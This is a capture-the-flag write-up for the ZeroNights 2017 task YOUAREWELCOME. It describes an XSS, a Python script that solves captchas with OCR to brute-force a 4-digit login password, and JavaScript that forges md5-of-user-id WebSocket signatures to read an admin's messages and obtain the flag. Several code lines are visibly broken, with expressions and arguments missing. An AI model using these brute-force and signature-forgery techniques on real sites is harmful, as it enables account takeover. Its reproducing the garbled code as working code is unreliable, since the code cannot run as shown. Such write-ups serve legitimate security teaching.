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Created October 27, 2017 23:06
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ZeroNights 2017 Day #3 / YOUAREWELCOME writeup
  1. XSS in feedback form. Got access to moderator account. Nothing useful here though, except the list of approved accounts.
  2. Trying to register own team - got password to email. Password is 4 digits, so can be easily bruteforced.
  3. Login form is protected with simple captcha. Wrote simple script using pytesseract to recognize captcha and bruteforce login form. After 10 minutes got password for one of approved team account.
import sys                                                                 
import io                   
import re                     
import requests                     
import pytesseract            
from PIL import Image  
from multiprocessing import Pool

def get_cap():    
    URL = ""                                        
    CAP_URL = ""
    r = requests.get(URL)                                    
    res = r.text                      
    h = re.findall("/captcha/image/([a-f0-9]+)/", res)[0]         
    img_f = io.BytesIO(requests.get(CAP_URL+h+"/").content)
    c = pytesseract.image_to_string(, config="./tesseract.config")
    return (h, c)   
def brute(x):
    URL = ""
    email = ""

    h, c = get_cap()
    r =, data={
        "_username": email,
        "captcha_0": h,
        "captcha_1": c
    if (r.status_code) != 400:
        print(email, x)

pool = Pool(10), range(1000,10000))
  1. Approved user accounts have WebSocket-based chat window. Every WebSocket message should contain signature which authorizes sender. Unfortunately, existing signatures was incorrect. Actually signature was md5('10'), while my user account id was 4. Tried use md5('4') and it worked.
    var my_user_id = 4,
        my_sign = "d3d9446802a44259755d38e6d163e820";
  1. There was two possible message types: "new" - subscribe to new messages and "message" - send the message to somebody. Sending messages to admin account was useless, so i decided to subscribe to new messages for admin account using md5('1') as a signature.
var uid = 1;
var sign = 'c4ca4238a0b923820dcc509a6f75849b';
ws = new WebSocket("ws://");
ws.onmessage = function(e) {
    try {
    } catch(Exception ) {

ws.onopen = function(){
        'type': 'new',
        'userid': uid,
        'signature': sign
  1. Seems like there was some issues with bot, sending flag messages to admin account, but after a while i got it. w0w_c0n6r47ul4710n_m337_47_z3r0n16h75
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